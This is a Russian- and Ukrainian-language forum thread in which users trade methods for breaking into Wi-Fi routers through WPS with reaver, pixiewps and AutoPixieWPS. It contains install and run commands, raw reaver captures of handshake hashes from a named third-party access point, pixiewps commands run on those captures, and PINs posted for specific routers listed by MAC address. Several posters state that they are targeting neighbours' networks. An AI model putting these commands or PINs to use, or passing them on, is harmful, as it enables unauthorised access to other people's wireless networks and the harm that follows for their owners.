3. chmod 755 (пробіл) з відкритої папки reaver-wps-fork-read-only - src перетягнути файлик - CONFIGURE

4. cd (пробіл) і перетягнути папку - SRC

5. ./configure

6. make

7. make install і закрити термінал

Новий термінал

8. cd (пробіл) і перетягнути папку SRC з папки pixiewps-master

9. make

10. make install і закрити термінал

новий термінал

11. iwconfig - airmon-ng start wlan0 - airodump-ng mon0

12. reaver -i mon0 -c ? -b xxxxxx -vv -S і зупинити, коли будуть всі дані

13. pixiewps -e PKE -s Hash1 -z Hash2 -a Auth Key -S

dxx258
08.04.2015, 22:37
1.

sudo apt-get install libssl-dev

sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev

cd reaver-wps-fork-read-only/src

chmod 775 configure

./configure

make

make install

2.

pixiewps-master/src

make

make install

" chmod 775 " я вводил это

vedemur
08.04.2015, 22:44
1.

sudo apt-get install libssl-dev

sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev

cd reaver-wps-fork-read-only/src

chmod 775 configure

./configure

make

make install

2.

pixiewps-master/src

make

make install

" chmod 775 " я вводил это



А это--sudo apt-get install libssl-dev-- откуда? В видео нет.

dxx258
08.04.2015, 22:45
А это--sudo apt-get install libssl-dev-- откуда?



из видео в описании

vedemur
08.04.2015, 22:57
Интересно, не нахожу, но учту, спасибо.

ivann
09.04.2015, 11:22
Всё верно, дело в моде reaver-ра и от сюда зависет работает иль нет, tp-link, из 8-ми, только один сдался,причём у которых lock wps (блок на 60 сек)-антон, dlink-ки из 5-ти два, к стати если чуть обождать перебор дольше, то суммы другие даёт и вот с ними dlink дал пин, остальные Pin not found, ZyXEL Keenetic два штуки 2-3 секунды и отдал pin.

Кто поглубже знает Линь, подскажите, как вернуть назад режим мониторинга, после патча на reaver сменилось обозначение wifi, было wlan1, а стало wlan1mon (думаю что мод, драйвер меняет), так из-за этого режим мониторинга не влючается на bully и Inflator.

СЕРЖ32
09.04.2015, 15:06
Всё верно, дело в моде reaver-ра и от сюда зависет работает иль нет, tp-link, из 8-ми, только один сдался,причём у которых lock wps (блок на 60 сек)-антон, dlink-ки из 5-ти два, к стати если чуть обождать перебор дольше, то суммы другие даёт и вот с ними dlink дал пин, остальные Pin not found, ZyXEL Keenetic два штуки 2-3 секунды и отдал pin.

Кто поглубже знает Линь, подскажите, как вернуть назад режим мониторинга, после патча на reaver сменилось обозначение wifi, было wlan1, а стало wlan1mon (думаю что мод, драйвер меняет), так из-за этого режим мониторинга не влючается на bully и Inflator.



так а какой должен быть мод reaver-ра по правильному,что бы работал правильно?

ivann
09.04.2015, 16:19
СЕРЖ32, у tp-link, которые на 60 сек, однозначно, wps отключен.(поэтому хоть минуту, час или перезагрузка роута ни чо не даёт)

reaver тот что по ссыле скачивания, а порядок его установки, более подробно, уже выше написали ((первый раз при запуске у меня тож перепор по порядку шёл)), я Kali, сейчас не пользую, поэтому пункты sudo apt-get install libssl-dev.....и т.д. не делаю.

-bI-
09.04.2015, 19:17
Всё верно, дело в моде reaver-ра и от сюда зависет работает иль нет, tp-link, из 8-ми, только один сдался,причём у которых lock wps (блок на 60 сек)-антон, dlink-ки из 5-ти два, к стати если чуть обождать перебор дольше, то суммы другие даёт и вот с ними dlink дал пин, остальные Pin not found, ZyXEL Keenetic два штуки 2-3 секунды и отдал pin.

Кто поглубже знает Линь, подскажите, как вернуть назад режим мониторинга, после патча на reaver сменилось обозначение wifi, было wlan1, а стало wlan1mon (думаю что мод, драйвер меняет), так из-за этого режим мониторинга не влючается на bully и Inflator.




Когда запускаешь airmon-zc получается wlan1mon, когда airmon-ng mon0, у меня с airmon-zc нет -1 при фиксированном канале, но пропадает wlanx, до airmon-zc stop wlanx.

СЕРЖ32
09.04.2015, 19:24
короче,всё получилось(не тот просто видимо ривер ставил),но вопрос возник:там при переборе пинов,на каждый пин разная информация(хешы и тд разные),так какие ж хешы подставлять,с самого первого пина,или скажем....с четвёртого?т.е информация абсолютно разная....что,все хешы пробовать что ли?))



ну вот,вот какие хешы выбирать?

Reaver v1.5 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Switching mon0 to channel 6

[+] Waiting for beacon from A0:F3:C1:44:A7:4A

[+] Associated with A0:F3:C1:44:A7:4A (ESSID: Piramida)

[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000

[+] Trying pin 12345670.

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[P] E-Nonce: f7:87:9b:b3:a9:8b:2a:0d:2d:99:b4:e4:ca:77:72:d5

[P] PKE: 75:6e:e5:08:f0:a5:a5:29:be:57:6b:c3:96:4c:8f:96:0f :97:c9:0c:76:19:8d:f0:92:44:52:30:b8:e5:1d:0e:30:2 b:eb:42:28:5f:85:74:64:36:25:c5:02:12:13:a5:91:76: 9f:ce:54:ea:0a:e2:24:2a:f1:81:89:6d:ed:a3:c1:a7:7e :bc:ae:92:48:79:1e:7f:99:c9:50:77:89:92:65:04:f9:1 a:c3:9d:6d:42:9f:65:2b:2e:13:04:a9:83:0d:0f:a2:35: db:34:c4:81:74:3d:9c:5b:06:c4:bf:73:ee:9b:c7:5a:f4 :8a:4d:6b:bd:c9:50:91:0f:61:56:53:1a:ad:59:c5:30:b d:19:b6:6f:ba:1a:22:ef:20:db:08:fc:5b:1c:5e:e4:d3: 1f:c5:84:54:87:07:ed:c1:84:74:ae:31:dd:cd:35:64:aa :42:43:c7:61:79:8b:bb:c8:3b:50:3f:d9:08:86:d2:95:d b:2a:12:49:c3:6a:fe:e2:f7

[P] WPS Manufacturer: TP-LINK

[P] WPS Model Number: 4.0

[+] Received M1 message

[P] AuthKey: 40:11:dd:34:20:c1:a8:4e:95:5c:f9:18:e8:46:03:dd:96 :30:5f:55:8c:e2:c3:c8:23:a0:07:ea:09:42:56:b0

[+] Sending M2 message

[P] E-Hash1: 44:5e:8a:80:54:d2:5f:c9:4d:c9:4d:c2:16:35:2a:9a:34 :c1:94:3e:94:4e:a2:aa:2a:af:ba:11:b8:d5:a6:5e

[P] E-Hash2: 7f:c7:a5:23:8a:9e:c0:ba:70:14:49:97:63:27:36:58:65 :2e:99:43:44:d1:c6:86:b6:01:aa:66:57:78:44:7e

[+] Received M3 message

[+] Sending M4 message

[+] Received WSC NACK

[+] Sending WSC NACK

[+] p1_index set to 1

[+] Pin count advanced: 1. Max pin attempts: 11000

C[+] Trying pin 00005678.

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[P] E-Nonce: da:35:7b:33:f5:1d:57:82:38:19:42:24:b6:1b:26:5b

[P] PKE: 44:4c:72:cb:2e:10:6a:5b:6a:4b:d4:5a:d9:24:2e:19:87 :63:d5:6a:8a:ae:56:66:52:45:79:22:85:65:27:5b:88:4 f:1b:7a:5e:7f:06:a8:23:a6:57:eb:f7:47:96:b2:8d:47: 93:1b:17:a2:8e:df:8e:d5:42:41:69:78:9a:b6:90:0e:3a :3f:74:2a:ed:d3:e7:36:05:22:75:0d:c2:75:ef:e9:f9:3 e:d9:0f:6c:67:90:00:f6:6a:cb:27:a9:75:c7:9d:e0:de: 19:23:b3:ff:5d:78:ed:21:fd:e1:7e:52:de:00:76:65:44 :c8:d8:0b:54:98:09:25:30:77:9c:cf:f1:43:df:19:83:8 5:ff:77:83:4f:fe:e5:a3:7b:ef:e1:7f:74:56:46:93:e2: b9:de:68:59:3b:46:11:b7:b0:b4:05:0d:08:07:a9:93:d7 :ee:46:73:fc:dd:0e:33:c5:c0:27:55:88:8f:89:ad:26:4 a:c9:aa:d8:ff:0b:59:04:2f

[P] WPS Manufacturer: TP-LINK

[P] WPS Model Number: 4.0

[+] Received M1 message

[P] AuthKey: 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74 :14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba

[+] Sending M2 message

C[P] E-Hash1: 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78 :33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c

[P] E-Hash2: 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63 :20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55

[+] Received M3 message

[+] Sending M4 message

[+] Received WSC NACK

[+] Sending WSC NACK

[+] p1_index set to 2

[+] Pin count advanced: 2. Max pin attempts: 11000

^C

[+] Session saved.

unkwn
09.04.2015, 23:58
PKE: 75:6e:e5:08:f0:a5:a5:29:be:57:6b:c3:96:4c:8f:96:0f :97:c9:0c:76:19:8d:f0:92:44:52:30:b8:e5:1d:0e:30:2 b:eb:42:28:5f:85:74:64:36:25:c5:02:12:13:a5:91:76: 9f:ce:54:ea:0a:e2:24:2a:f1:81:89:6d:ed:a3:c1:a7:7e :bc:ae:92:48:79:1e:7f:99:c9:50:77:89:92:65:04:f9:1 a:c3:9d:6d:42:9f:65:2b:2e:13:04:a9:83:0d:0f:a2:35: db:34:c4:81:74:3d:9c:5b:06:c4:bf:73:ee:9b:c7:5a:f4 :8a:4d:6b:bd:c9:50:91:0f:61:56:53:1a:ad:59:c5:30:b d:19:b6:6f:ba:1a:22:ef:20:db:08:fc:5b:1c:5e:e4:d3: 1f:c5:84:54:87:07:ed:c1:84:74:ae:31:dd:cd:35:64:aa :42:43:c7:61:79:8b:bb:c8:3b:50:3f:d9:08:86:d2:95:d b:2a:12:49:c3:6a:fe:e2:f7

E-Hash1: 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78 :33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c

E-Hash2: 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63 :20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55

AuthKey: 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74 :14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba

все , что тебе нужно

unkwn
10.04.2015, 00:00
и я тебя огорчу. данный TP-LINK не ломается. я только что прогнал этот pixiewps по твоим данным...

pixiewps -e 44:4c:72:cb:2e:10:6a:5b:6a:4b:d4:5a:d9:24:2e:19:87 :63:d5:6a:8a:ae:56:66:52:45:79:22:85:65:27:5b:88:4 f:1b:7a:5e:7f:06:a8:23:a6:57:eb:f7:47:96:b2:8d:47: 93:1b:17:a2:8e:df:8e:d5:42:41:69:78:9a:b6:90:0e:3a :3f:74:2a:ed:d3:e7:36:05:22:75:0d:c2:75:ef:e9:f9:3 e:d9:0f:6c:67:90:00:f6:6a:cb:27:a9:75:c7:9d:e0:de: 19:23:b3:ff:5d:78:ed:21:fd:e1:7e:52:de:00:76:65:44 :c8:d8:0b:54:98:09:25:30:77:9c:cf:f1:43:df:19:83:8 5:ff:77:83:4f:fe:e5:a3:7b:ef:e1:7f:74:56:46:93:e2: b9:de:68:59:3b:46:11:b7:b0:b4:05:0d:08:07:a9:93:d7 :ee:46:73:fc:dd:0e:33:c5:c0:27:55:88:8f:89:ad:26:4 a:c9:aa:d8:ff:0b:59:04:2f -s 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78 :33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c -z 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63 :20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55 -a 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74 :14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba -S

СЕРЖ32
10.04.2015, 00:08
и я тебя огорчу. данный TP-LINK не ломается. я только что прогнал этот pixiewps по твоим данным...

pixiewps -e 44:4c:72:cb:2e:10:6a:5b:6a:4b:d4:5a:d9:24:2e:19:87 :63:d5:6a:8a:ae:56:66:52:45:79:22:85:65:27:5b:88:4 f:1b:7a:5e:7f:06:a8:23:a6:57:eb:f7:47:96:b2:8d:47: 93:1b:17:a2:8e:df:8e:d5:42:41:69:78:9a:b6:90:0e:3a :3f:74:2a:ed:d3:e7:36:05:22:75:0d:c2:75:ef:e9:f9:3 e:d9:0f:6c:67:90:00:f6:6a:cb:27:a9:75:c7:9d:e0:de: 19:23:b3:ff:5d:78:ed:21:fd:e1:7e:52:de:00:76:65:44 :c8:d8:0b:54:98:09:25:30:77:9c:cf:f1:43:df:19:83:8 5:ff:77:83:4f:fe:e5:a3:7b:ef:e1:7f:74:56:46:93:e2: b9:de:68:59:3b:46:11:b7:b0:b4:05:0d:08:07:a9:93:d7 :ee:46:73:fc:dd:0e:33:c5:c0:27:55:88:8f:89:ad:26:4 a:c9:aa:d8:ff:0b:59:04:2f -s 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78 :33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c -z 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63 :20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55 -a 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74 :14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba -S



так а хешы какие выбирать,они ж разные......после первого пина одни данные,после другого пина другие данные и тд......так какие хешы то подставлять?

ivann
10.04.2015, 00:21
-bI-, та вот блин не пойму, я запускаю airmon-ng

vedemur
10.04.2015, 11:59
-bI-, та вот блин не пойму, я запускаю airmon-ng



Причём здесь airmon-ng. Человек спрашивает о другом. Согласно видео данные брались с первого перебора, но кто-то выше написал, что ждал несколько переборов и в одном из них удалось поймать пин. Значит он запускал pixiewps для каждого перебора по очереди. Я так понял.

ivann
10.04.2015, 12:33
vedemur, к чему Ваш пост ?, airmon-ng адресован другому.

p.s. читайте внимательней.

vedemur
10.04.2015, 12:44
vedemur, к чему Ваш пост ?, airmon-ng адресован другому.

p.s. читайте внимательней.



Извиняюсь, не обратил внимание, что есть такой пользователь под именем -bI-. А то, что написал в посте 2446 касается СЕРЖ32.

vedemur
12.04.2015, 11:57
Я никак не пойму когда пишется sudo, а когда нет, объясните п.ж. И ещё, есть интересное здесь http://matthewhknight.com/autopixiewps/

vedemur
12.04.2015, 12:47
1.

sudo apt-get install libssl-dev

sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev

cd reaver-wps-fork-read-only/src

chmod 775 configure

./configure

make

make install

2.

pixiewps-master/src

make

make install

" chmod 775 " я вводил это



libssl-dev устанавливается в Kali Linux версии ниже 1,1,0, а начиная с версии 1,1,0 и выше не надо-уже учтено.

binarymaster
12.04.2015, 14:47
Я никак не пойму когда пишется sudo, а когда нет, объясните п.ж.



Зависит от случая. Sudo используется для выполнения команд под root (читай с правами администратора). Если вы уже зашли в систему под пользователем root, использование sudo не обязательно.

Vikhedgehog
14.04.2015, 01:07
Кто-нибудь знает пин код от роутера ZyXEL NBG460N-EE? Думал что алгоритм как у кинетиков, а оказалось нет. Лока WPS вроде нет, но что-то я не привык тратить 10 часов на взлом зухеля

Payer
14.04.2015, 08:33
Кто-нибудь знает пин код от роутера ZyXEL NBG460N-EE? Думал что алгоритм как у кинетиков, а оказалось нет. Лока WPS вроде нет, но что-то я не привык тратить 10 часов на взлом зухеля


Один только есть

40:4A:03:8D:4D:30

46883346

и еще нашелся

40:4A:03:8D:51:0C

22648808

СЕРЖ32
15.04.2015, 15:41
что то тема не развивается по pixiewps,видимо не эффективная прога,или для малого количества точек....Кому ещё удавалось пин вытащить?какие это точки были(бренды).

TOX1C
15.04.2015, 15:52
была бы эта софтина под винду, а ещё лучше автоматизированный гуй с функцией авторматического парсинга хешей из cap файла, я попробовал бы её работу на разных точках. просто нет никакого желания ставить линукс ради одного скрипта.

ak_45
15.04.2015, 16:19
была бы эта софтина под винду, а ещё лучше автоматизированный гуй с функцией авторматического парсинга хешей из cap файла, я попробовал бы её работу на разных точках. просто нет никакого желания ставить линукс ради одного скрипта.



пха...а зачем линукс ставить? с виртуалки запускай...

кстати вышел автоскрипт AutoPixieWPS.

vedemur
15.04.2015, 16:35
Что PixieWPS, что AutoPixieWPS-результат одинаковый- pin not found. Использую Kali Linux с флешки.

СЕРЖ32
16.04.2015, 17:05
кто уже тестил

AutoPixieWps?не понял,как его запускать,вроде команды уже другие какие то,не так запускается,как PixieWps,подскажите...

vedemur
16.04.2015, 17:51
кто уже тестил

AutoPixieWps?не понял,как его запускать,вроде команды уже другие какие то,не так запускается,как PixieWps,подскажите...


Всё то-же, только надо доустановить скрипт AutoPixieWps и далее по видео.

СЕРЖ32
17.04.2015, 12:25
Хм.....что то не получается:как доустановить скрипт AutoPixieWps?ну скачал скрипт,как его доустановить?и как потом вообще запускать AutoPixieWps?видео по нему нет,не видел...как запускать просто PixieWps понятно,а как именно AutoPixieWps?

user100
17.04.2015, 12:59
Хм.....что то не получается:как доустановить скрипт AutoPixieWps?ну скачал скрипт,как его доустановить?и как потом вообще запускать AutoPixieWps?видео по нему нет,не видел...как запускать просто PixieWps понятно,а как именно AutoPixieWps?


Доустановить что простите?

Запуск скрипта всего из 2х строчек в консоле.

1. Даем права на исполнение скрипта:

chmod +x autopixie.py

2. Запускаем сам скримпт:

./autopixie.py

Какие у вас проблемы со скриптом?

СЕРЖ32
17.04.2015, 13:58
Доустановить что простите?

Запуск скрипта всего из 2х строчек в консоле.

1. Даем права на исполнение скрипта:

chmod +x autopixie.py

2. Запускаем сам скримпт:

./autopixie.py

Какие у вас проблемы со скриптом?



так а что должно появится при запуске этого скрипта?меню какое то?я просто не понимаю как работает autopixie.....можно скрин хотя бы(видео лучше было б конечно)запуска этого скрина.Вообще,в чём отличие в работе от просто pixiewps?

user100
17.04.2015, 14:14
так а что должно появится при запуске этого скрипта?меню какое то?я просто не понимаю как работает autopixie.....можно скрин хотя бы(видео лучше было б конечно)запуска этого скрина.Вообще,в чём отличие в работе от просто pixiewps?


http://sh.uploads.ru/t/Ce3kK.png

СЕРЖ32
17.04.2015, 15:41
http://sh.uploads.ru/t/Ce3kK.png


спасибо!вот это другое дело)

СЕРЖ32
17.04.2015, 15:42
спасибо!вот это другое дело)



вот у меня такого меню нет,значит не запускается.....

vedemur
17.04.2015, 16:17
Доустановить что простите?

Запуск скрипта всего из 2х строчек в консоле.

1. Даем права на исполнение скрипта:

chmod +x autopixie.py

2. Запускаем сам скримпт:

./autopixie.py

Какие у вас проблемы со скриптом?



Первым будет: cd (пробел) и перетянуть папку AutoPixie.py и далее как описано, тогда получится.

СЕРЖ32
17.04.2015, 16:32
Первым будет: cd (пробел) и перетянуть папку AutoPixie.py и далее как описано, тогда получится.



так и делал,всё равно что то не запускается,т.е такого меню(зелёного)нет...

СЕРЖ32
17.04.2015, 16:34
так и делал,всё равно что то не запускается,т.е такого меню(зелёного)нет...



типа пишет:не та дериктория или что то в этом роде,ну так копирую в Home,непонимаю в чём проблема....

vedemur
17.04.2015, 17:59
Да из папки HOME перетяни и далее как я написал выше. Что не понятного? Ну посмотри видео где качал скрипт в конце концов.

binarymaster
17.04.2015, 20:51
Хм.....что то не получается:как доустановить скрипт AutoPixieWps?ну скачал скрипт,как его доустановить?и как потом вообще запускать AutoPixieWps?видео по нему нет,не видел...как запускать просто PixieWps понятно,а как именно AutoPixieWps?


Тут всё пошагово описано:

http://matthewhknight.com/autopixiewps/

СЕРЖ32
17.04.2015, 23:37
Тут всё пошагово описано:

http://matthewhknight.com/autopixiewps/



спасибо!вот это то,как надо))

Vikhedgehog
24.04.2015, 17:43
На новых прошивках ZyXEL Keenetic в настройках WPS появилась новая опция, разрешающая использовать PIN код. По умолчанию опция выключена, а на улицах стали появляться кинетики без WPS. Это значит что взлому зюхелей пришел конец?

Сейчас обновил свой кинетик 4G II, действительно, больше не взламывается. Так что вот так.

Algierd
25.04.2015, 00:36
А вот что делать с роутерами ZTE у которых включен wps, но по wps они не ломаются т.к его там просто нету ? Живу в частном секторе, такой дряни от байфлая уйма вокруг. Должна же быть какая-то лазейка?

Vikhedgehog
25.04.2015, 00:47
А вот что делать с роутерами ZTE у которых включен wps, но по wps они не ломаются т.к его там просто нету ? Живу в частном секторе, такой дряни от байфлая уйма вокруг. Должна же быть какая-то лазейка?



Как правило если провайдерский роутер не ломается по WPS, то у него пароль сгенерирован по алгоритму, либо открыт порт 80. По крайней мере так в мск.

Algierd
25.04.2015, 03:19
Как правило если провайдерский роутер не ломается по WPS, то у него пароль сгенерирован по алгоритму, либо открыт порт 80. По крайней мере так в мск.



Рядом есть два таких:

CC:7B:35

2C:95:7F

wps включен, но пин-кода у них нету, ловил хендшейки, но они не раскалываются, какие практические действия чтобы вскрыть?

vedemur
26.04.2015, 15:12
Подскажите п.ж. как бороться с роутерами, у которых после 16-18 пинов WPS Lock переключается с No на Yes и перебор на этом заканчивается. Заранее спасибо.

Garnett
28.04.2015, 12:08
Здравствуйте.

Подскажите, при взломе ривером через перебор пинов при остановке взлома сессия сохраняется и при возобновлении продолжается с того же места. Ломаю с помощью загрузочного диска Бэк Трэк. Можно ли как нибудь сохранить эту сессию на комп или флешку, чтобы после перезагрузки компа продолжить оттуда же. Ломается сеть очень долго, 10% только за ночь.

Klaatu
28.04.2015, 20:56
сохранить эту сессию



/usr/local/etc/reaver

W@rdrive
09.05.2015, 01:04
Кто-то имел дело с Асусами типа 50:46:5d:86:**:** или 50:46:5d:87:**:**? Никак не могу найти алгоритм генерации пина, а после десяти попыток он лочится. Подобрал пару паролей брутом, а вот с WPS - засада

sergey289
11.05.2015, 22:32
Здравствуйте! Подскажите, пожалуйста, пин для двух роутеров (или хотя бы для одного)

DIR-615

MAC: 90:94:E4:33:2F:9E

NETGEAR (WNR1000v2)

MAC: E0:46:9A:5CA:68

Спасибо.

binarymaster
12.05.2015, 01:14
DIR-615

MAC: 90:94:E4:33:2F:9E



Попробуйте 33545264 и 33814827.

CRACK211
12.05.2015, 10:14
Подскажите подалйста правильно я вввел команду которую он предложил? И есть ли еще команды комбинации крманд чтобы попробовать?

[-] WPS pin not found!

Time taken: 6 s

[!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.

root@kali:~/Desktop/pixiewps-master/src# pixiewps -e ff:cb:8c:48:6d:7f:b1:8a:83:a0:d3:93:c8:7b:50:86:a6 :8c:51:67:2c:62:6f:cf:e2:7c:2f:9d:72:98:62:4b:37:d d:31:3c:b4:38:07:bc:e6:f7:83:f2:13:e3:44:77:c0:7e: 1d:55:0f:8a:b4:79:16:df:e4:a0:c5:e5:24:40:9a:a8:da :d2:6c:6e:72:fb:ae:b4:d7:87:86:60:21:91:08:ac:cf:7 f:99:19:06:2b:41:93:06:64:ba:a9:1f:35:91:9f:ee:65: f0:d4:d3:f8:21:7b:67:57:a8:9b:5d:92:06:94:53:3a:fc :35:6e:21:e7:d4:1a:0e:c4:9c:05:66:ca:06:71:3c:9b:f f:60:44:e4:62:ab:a1:37:ec:2b:02:44:52:18:81:1d:8d: 6a:a8:2d:df:a8:ec:79:bb:47:97:f5:dd:4d:c4:ae:24:2d :b7:e7:3c:7b:ef:f8:f6:5a:6b:59:06:ac:c8:f2:c0:30:6 b:03:eb:cd:bb:9a:e4:c1:04 -s 91:d5:dd:a0:4f:83:f4:0d:d6:a3:67:8c:8d:0a:71:b9:25 :9d:9d:bd:b5:38:73:0e:fe:a1:79:e9:eb:6a:83:28 -z 2a:90:57:a8:bc:be:5a:d8:a9:76:31:f2:fa:35:b0:07:b6 :99:fc:cc:84:bd:90:a8:fb:5b:d7:09:a8:84:54:0f -a 1d:bf:b3:26:c2:32:88:78:9a:47:4e:46:f0:2a:1d:17:eb :b4:5e:2f:38:61:02:48:4e:d0:ff:9b:47:4c:63:6a -n 32:26:00:00:00:00:00:00:00:00:00:00:00:00:00:00 -S -f 4

sergey289
13.05.2015, 20:34
Попробуйте 33545264 и 33814827.



Спасибо, но, к сожалению не подходит. А с netgear никак?

resident148
14.05.2015, 20:34
sergey289

Длинк хорошо перебирается ривером, как и нетгир. Еще wps pixie хорошо с длинками работает

Anton91x
15.05.2015, 11:24
Здравствуйте! Подскажите, пожалуйста, пин для двух роутеров (или хотя бы для одного)

DIR-615

MAC: 90:94:E4:33:2F:9E

NETGEAR (WNR1000v2)

MAC: E0:46:9A:5CA:68

Спасибо.



На dlink еще пины 04633907, 85597747, 44994518 можете попробовать

Anton91x
15.05.2015, 11:41
Здравствуйте, соседский wifi сигнал 100%

ssid Dlink

mac c8:d3:a3:ce:4d:f6 (DSL 2750U судя по маку)

если кто имел дело с этим роутером подскажите пин или алгоритм, по которому он генерируется

уже пробовал 21464065, 35203742, 21747229, 62327145 после 10 пинов он локнулся

pixiewps pin not found! хотя чипсет у него broadcom

utyara
15.05.2015, 20:10
Здравствуйте, соседский wifi сигнал 100%

ssid Dlink

mac c8:d3:a3:ce:4d:f6 (DSL 2750U судя по маку)

если кто имел дело с этим роутером подскажите пин или алгоритм, по которому он генерируется

уже пробовал 21464065, 35203742, 21747229, 62327145 после 10 пинов он локнулся

pixiewps pin not found! хотя чипсет у него broadcom



1708421

Anton91x
15.05.2015, 21:19
1708421



Спасибо, проверю когда точка выйдет из лока. А как Вы рассчитываете pin?

Может кому пригодится хороший генератор пинов под андроид https://play.google.com/store/apps/details?id=com.ngb.wpsconnect содержит большую базу данных

sergey289
17.05.2015, 16:41
04633907, 85597747, 44994518



Тоже не подходят.



sergey289

Длинк хорошо перебирается ривером, как и нетгир. Еще wps pixie хорошо с длинками работает



Спасибо за совет, но я в этом мало что понимаю . Думал, может получится по алгоритмам вычислить пин.

resident148
17.05.2015, 19:45
Спасибо за совет, но я в этом мало что понимаю


Тогда советую записать на флешку образ wifislax, и воспользоваться утилитой goyscript из представленных в образе, там практически все автоматизировано

Vovan71
18.05.2015, 22:35
Может кто и мне подскажет - асус rt-n12c1

10:bf:48:92:95:70

9606512 не сработал.

Или вот для этого c4:6e:1f:6d:d7:b1

Опять же 7198641 не хочет принимать :-(

Заранее спасибо за любые идеи

Anton91x
18.05.2015, 23:44
Может кто и мне подскажет - асус rt-n12c1

10:bf:48:92:95:70

9606512 не сработал.

Или вот для этого c4:6e:1f:6d:d7:b1

Опять же 7198641 не хочет принимать :-(

Заранее спасибо за любые идеи



Для асуса попробуйте 75660642

Vovan71
19.05.2015, 02:20
Для асуса попробуйте 75660642



Спасибо! Попробовал

Но в ответ асус лишь тихо залочился. Не тот...

utyara
19.05.2015, 13:20
Спасибо, проверю когда точка выйдет из лока. А как Вы рассчитываете pin?

у меня маленький листочек с пинами dlink взял на ачате вроде

henri2002
20.05.2015, 17:59
а здесь не совпало.

AC:22:0B:BB:CA:00 27354001 ASUS RT-N10E

AC:22:0B:ECC:00 44364045 ASUS RT-N10E

TOX1C
20.05.2015, 18:46
5 и 6 цифры совпали) если искать по концу мака совпадения, то они явно есть, так как пины в тех местах или совпадают, или там близкие числа - 56, 58, 63 например

Vikhedgehog
20.05.2015, 20:11
Скиньте возможные пин коды от 60:A4:4C:XX:XX:4C если у кого-то есть. Благодарю)

VladimirV
20.05.2015, 20:38
Я заметил совпадения давно.

Проверял в командировках, и ломал ASUSы по WPS. Бывает совпадет первая половина пина. Бывает полностью.

Это лучше чем ничего!

И, я думал натолкнуть кого-то на мысль по взлому алгоритма!

VladimirV
20.05.2015, 20:39
Скиньте возможные пин коды от 60:A4:4C:XX:XX:4C если у кого-то есть. Благодарю)



Таких в моей базе нет.

Vikhedgehog
20.05.2015, 21:20
Таких в моей базе нет.



Не знаете, у более дорогих роутеров типа RT-N66U такая же закономерность или ее нет?

VladimirV
20.05.2015, 21:41
Не знаете, у более дорогих роутеров типа RT-N66U такая же закономерность или ее нет?



Сверяйте сами. Сделано с базы порядка 230 000. Спасибо Sheez и Payer.

http://rghost.ru/private/8dFPRN2rT/42ab7e28beb4cedac0c5ce35697fb9b3

У Dlinkов тоже есть совпадения но сделаю позже!

TOX1C
20.05.2015, 22:09
Совпадение? Не думаю

http://s011.radikal.ru/i318/1505/63/1e87ca3ebf03.png

хорошо бы базу от дублей почистить

Talay
21.05.2015, 02:44
Mac c0:4a:00:f4:f8:e4

Не подскажете пин?

Stalker5
21.05.2015, 23:34
MAC F0:7D:68:91:5B:C8

Название точки D-link

Можете подсказать пин? Заранее Спасибо!

VladimirV
21.05.2015, 23:57
MAC F0:7D:68:91:5B:C8

Название точки D-link

Можете подсказать пин? Заранее Спасибо!



Это DIR-300 генераторов к нему нет. Он должен нормально перебираться полным перебором.

Stalker5
21.05.2015, 23:59
я не помню точно, по-моему там мне писало AP rate limited и т.д., вообщем точка банила меня. Попробую ещё раз, может это с другой точкой было, хорошо хоть сигнал хороший.

col
22.05.2015, 12:02
Спасибо, проверю когда точка выйдет из лока. А как Вы рассчитываете pin?

Может кому пригодится хороший генератор пинов под андроид https://play.google.com/store/apps/details?id=com.ngb.wpsconnect содержит большую базу данных



у меня в андроиде постоянно прописаны 2 программы Wps Connect и Wps Wpa Tester. по сути одинаковы но базы немного отличаются,в общем и с андроидом можно жить.

единственное там root права нужны,но это другая история

pwr2
22.05.2015, 12:32
Асус

10:BF:48 : 91 : D1 : 9C

Похожие маки кому попадались и с какими пинами?

Stalker5
23.05.2015, 21:25
DIR-620_C

90:94:E4:EE:E7:BC

Есть ПИН?

resident148
23.05.2015, 21:31
Асус

10:BF:48:91 : D1 : 9C



30638402 пин к этому роутеру, поправка - 75159320 (пробелы от палева не спасут, не усложняйте простые ситуации)

VladimirV
23.05.2015, 21:32
DIR-620_C

90:94:E4:EE:E7:BC

Есть ПИН?



reaver -i mon0 -b 90:94:E4:EE:E7:BC -vv -c -p5656892

Последнюю цифру ривер добавит сам.

resident148
